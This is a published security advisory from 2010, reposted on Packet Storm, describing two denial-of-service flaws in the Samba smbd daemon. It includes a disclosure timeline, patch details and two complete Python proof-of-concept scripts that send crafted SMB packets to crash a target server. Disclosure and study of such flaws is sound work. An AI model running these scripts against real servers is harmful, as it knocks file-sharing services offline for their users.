Samba Denial Of Service

2010-05-12T00:00:00
ID PACKETSTORM:89438
Type packetstorm
Reporter laurent gaffie
Modified 2010-05-12T00:00:00

Description

                                        
                                            `===============================================================================  
stratsec Security Advisory: SS-2010-005  
===============================================================================  
  
Title: Samba Multiple DoS Vulnerabilities  
Version: 1.0  
Issue type: Multiple  
Affected vendor: Samba  
Release date: 12/05/2010  
Discovered by: Laurent Gaffié  
Issue status: Patch available  
  
===============================================================================  
  
Summary  
-------  
  
Two vulnerabilities were discovered within in the Samba Smbd daemon which allow  
an attacker to trigger a null pointer dereference or an uninitialized variable   
read by sending a specific 'Sessions Setup AndX' query. Successful exploitation  
of these issues will result in a denial of service.  
  
Description  
-----------  
  
The Server Message Block (SMB) protocol, also known as Common Internet File   
System (CIFS) acts as an application-layer protocol to provide shared access to  
files, printers and Inter-Process Communication (IPC). It is also a transport   
for Distributed Computing Environment / Remote Procedure Call (DCE / RPC)   
operations. After negotiating an SMB communication the client sends a   
'Session Setup AndX' packet to negotiate a session in order to be able to   
connect on a specific share.  
  
To trigger the null pointer dereference, the client needs to send a crafted SMB  
'Negotiate Protocol' query with the SMB header 'Flags2' set to '0x0003'   
(no Unicode), followed by a Session Setup AndX request with the SMB header   
'Flags2' set to '0x8003' (Unicode). This sequence will result in a crash within  
the Smbd process.  
  
The uninitialised Variable Read issue, can be triggered if the client sends a   
crafted 'Session Setup AndX' with a 'security blob length' value set to   
'\xff\xff'.  
  
Impact  
------  
  
A remote attacker can cause a denial of service within the Samba daemon   
  
Affected products  
-----------------  
  
Samba <=3.4.7 and Samba <= 3.5.1  
  
Proof of concept  
----------------  
  
To trigger the uninitialised variable read issue, the following Python   
proof of concept is available:  
  
import sys,socket  
from socket import *  
  
if len(sys.argv)<=1:   
sys.exit('Usage: python smbd.py 10.0.0.12')  
  
host = sys.argv[1],445  
  
packetnego=(  
"\x00\x00\x00\xaa"  
"\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x03\x00\x00\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xca\x00\x00\x00\x00"  
"\x00\x87\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50"  
"\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x1a\x45\x4e\x49"  
"\x58\x20\x43\x4f\x52\x45\x00\x02\x4d\x49\x43\x52\x4f\x53\x4f\x46"  
"\x54\x20\x4e\x45\x54\x57\x4f\x52\x4b\x53\x20\x31\x2e\x30\x33\x00"  
"\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64"  
"\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75"  
"\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30"  
"\x30\x32\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e"  
"\x54\x20\x4c\x4d\x20\x76\x2e\x31\x32\x00"  
)  
  
payload=(  
"\x00\x00\x01\xa3"  
"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x03\x80\x00\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
"\x00\x41\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
"\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xca\x00\x00\x00"  
"\x00\x0d\x75\x00\xd6\x00\x04\x11\x0a\x00\x00\x00\x00\x00\x00\x00"  
"\x18\x00\x18\x00\x00\x00\x00\x00\xd4\x00\x00\x00\x99\x00\x36\xed"  
"\x7f\xf4\x6b\xeb\x15\x65\x2e\xb5\xc9\x70\xbe\x39\xfa\x89\x56\x5b"  
"\xb0\xc2\x56\x40\x11\x6c\xe6\x33\x1e\x93\x02\xd3\xd3\x2e\x17\xad"  
"\x1f\x37\x23\xcf\x7e\x4c\xd7\x64\xbe\xd5\xdc\x1f\x23\xe0\x69\x41"  
"\x00\x64\x00\x6d\x00\x69\x00\x6e\x00\x69\x00\x73\x00\x74\x00\x72"  
"\x00\x61\x00\x74\x00\x65\x00\x75\x00\x72\x00\x00\x00\x4e\x00\x54"  
"\x00\x34\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77"  
"\x00\x73\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x31\x00\x33\x00\x38"  
"\x00\x31\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f"  
"\x00\x77\x00\x73\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x34\x00\x2e"  
"\x00\x30\x00\x00\x00\x00\x00\x04\xff\x00\x00\x00\x00\x00\x01\x00"  
"\x31\x00\x00\x5c\x00\x5c\x00\x31\x00\x39\x00\x32\x00\x2e\x00\x31"  
"\x00\x36\x00\x38\x00\x2e\x00\x30\x00\x2e\x00\x31\x00\x30\x00\x34"  
"\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f"  
"\x3f\x3f\x00"  
)  
  
s = socket(AF_INET, SOCK_STREAM)  
s.connect(host)   
s.send(''.join(packetnego))  
s.send(''.join(payload))  
  
  
To trigger the null pointer dereference issue this Python proof of  
concept is available:  
  
import sys,socket  
from socket import *  
  
if len(sys.argv)<=1:   
sys.exit('python smbd.py 10.0.0.12')  
  
host = sys.argv[1],445  
  
packetnego=(  
"\x00\x00\x00\x85"  
"\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x53\xc8\x00\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00"  
"\x00\x62\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50"  
"\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x4c\x41\x4e\x4d"  
"\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66"  
"\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e"  
"\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"  
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c\x4d\x20"  
"\x30\x2e\x31\x32\x00"  
)  
  
payload=(  
"\x00\x00\x00\xec"  
"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x40\x00"  
"\x0c\xff\x00\xec\x00\x04\x11\x32\x00\x00\x00\x00\x00\x00\x00"  
"\xff\xff" ## Security blob set to \xff\xff here  
"\x00\x00\x00\x00\xd4\x00\x00\xa0\xb1\x00\x60\x48\x06\x06\x2b"  
"\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b"  
"\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c"  
"\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28"  
"\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00"  
"\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00"  
"\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00"  
"\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00"  
"\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00"  
"\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00"  
"\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"  
)  
s = socket(AF_INET, SOCK_STREAM)  
s.connect(host)   
s.send(''.join(packetnego))  
s.send(''.join(payload))  
  
Solution  
--------  
  
Update to version 3.5.2 or 3.4.8 (http://samba.org/)   
  
Response timeline  
-----------------  
  
* 09/03/2010 - Null pointer dereference issue reported to vendor.  
* 09/03/2010 - Vendor acknowledges receipt of advisory 2 hours after  
receiving the initial email  
* 09/03/2010 - Vendor confirms issue presence, and provide a patch 3  
hours after receiving the initial email.   
* 09/03/2010 - stratsec confirms patch resolves issue.  
* 15/03/2010 - Uninitialised Variable Read issue reported to vendor.  
* 15/03/2010 - Vendor confirms the issue and provides a patch 5 hours  
after receiving the initial email.  
* 15/03/2010 - stratsec confirms patch resolves issue  
* 07/04/2010 - Version 3.5.2 released by the vendor fixing both issues.  
* 11/05/2010 - Version 3.4.8 released by the vendor fixing both issues.  
* 12/05/2010 - This advisory published.  
  
References  
----------  
* Vendor advisory: http://samba.org/samba/history/samba-3.4.8.html   
* https://bugzilla.samba.org/show_bug.cgi?id=7254  
* stratsec would like to thanks the Samba Security Team for their   
responsiveness while handling theses issues  
  
===============================================================================  
  
About stratsec  
--------------  
stratsec, specialises in providing information security consulting and testing  
services for government and commercial clients. Established in 2004, we are  
now one of the leading independent information security companies in the  
Australasian and SE-Asian region, with offices throughout Australia and in  
Singapore and Malaysia.   
  
For more information, please visit our website at http://www.stratsec.net/   
  
===============================================================================  
--   
Message protected by MailGuard: e-mail anti-virus, anti-spam and content filtering.http://www.mailguard.com.au/mg  
  
`